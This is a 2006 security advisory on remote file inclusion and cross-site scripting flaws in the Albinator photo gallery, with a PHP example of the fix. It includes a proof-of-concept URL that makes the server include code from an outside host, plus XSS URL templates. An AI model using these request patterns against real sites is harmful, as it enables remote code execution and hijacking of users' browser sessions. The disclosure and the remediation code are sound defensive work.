SECURITYVULNS:DOC:12530
May 03, 2006

albinator <= 2.0.8 Remote File Inclusion Vuln and XSS


###############################################
Vuln. discovered by: VietMafia & r0t (Pridels Sec Crew)
Date: 3 May 2006
vendor: http://www.albinator.com/
affected versions: 2.8 and prior
original advisory: http://pridels.blogspot.com/2006/05/albinator-208-remote-file-inclusion.html
###############################################

Vuln. Description:

  1. Remote File Inclusion Vuln.

Input passed to the "Config_rootdir" parameter in "eday.php",
"eshow.php" and "forgot.php" isn't properly verified before it is used
to include files. This can be exploited to include arbitrary files from
external and local resources.

Example code:

$dirpath = "$Config_rootdir";
require_once($dirpath."essential/dbc_essential.php");
require_once($dirpath."essential/globalfunctions.php");

This can lead to remote file inclusion.

Example PoC:

http://victim/eshow.php?Config_rootdir=http://evilcode.php

  2. Cross-site scripting attack vuln.

Input passed to the "cid" parameter in dlisting.php and to the
"preloadSlideShow" parameter in showpic.php is not properly sanitised
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.

Examples:

/dlisting.php?cid=1[XSS]

/showpic.php?aid=21&uuid=175&pid=172&slide_show=1&slide_show_secs=0&preloadSlideShow=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
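
One way to apply the solution above in PHP, as an added example that is not Albinator's code and not part of the original advisory. It assumes the affected scripts sit in the application root, that "cid" is a numeric id, and that "preloadSlideShow" is echoed into HTML; the alb_* names are hypothetical.

```php
<?php
// Added example, not Albinator's code; alb_* names are hypothetical.

// Fix 1: take the include base from the script's own location, not from a
// variable that a request parameter such as Config_rootdir can populate.
define('ALB_ROOT', __DIR__ . '/');

// Relative paths from the advisory's snippet; nothing else may be loaded.
const ALB_INCLUDES = ['essential/dbc_essential.php', 'essential/globalfunctions.php'];

/** Build a local include path; throws if $relative is not on the allowlist. */
function alb_include_path(string $relative): string
{
    if (!in_array($relative, ALB_INCLUDES, true)) {
        throw new InvalidArgumentException('include not on allowlist');
    }
    return ALB_ROOT . $relative;
}

/** Fix 2a: read an id such as "cid" (assumed numeric); null if missing or invalid. */
function alb_int_param(array $src, string $name): ?int
{
    $value = filter_var($src[$name] ?? null, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 0]]);
    return $value === false ? null : $value;
}

/** Fix 2b: encode a value such as "preloadSlideShow" before echoing it into HTML. */
function alb_h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Constructed request shaped like the advisory's examples.
$request = [
    'Config_rootdir'   => 'http://example.invalid/',
    'cid'              => '1"><b>markup</b>',
    'preloadSlideShow' => '"><b>markup</b>',
];

foreach (ALB_INCLUDES as $relative) {
    // In the real scripts this string is what require_once() receives;
    // $request['Config_rootdir'] is never consulted.
    echo alb_include_path($relative), PHP_EOL;
}
$cid = alb_int_param($request, 'cid');
echo $cid === null ? 'cid rejected' : "cid = $cid", PHP_EOL;
echo alb_h($request['preloadSlideShow']), PHP_EOL;
```

htmlspecialchars() is only the right encoder for an HTML context; if a value is written into a script block instead, json_encode() with JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT is the matching one.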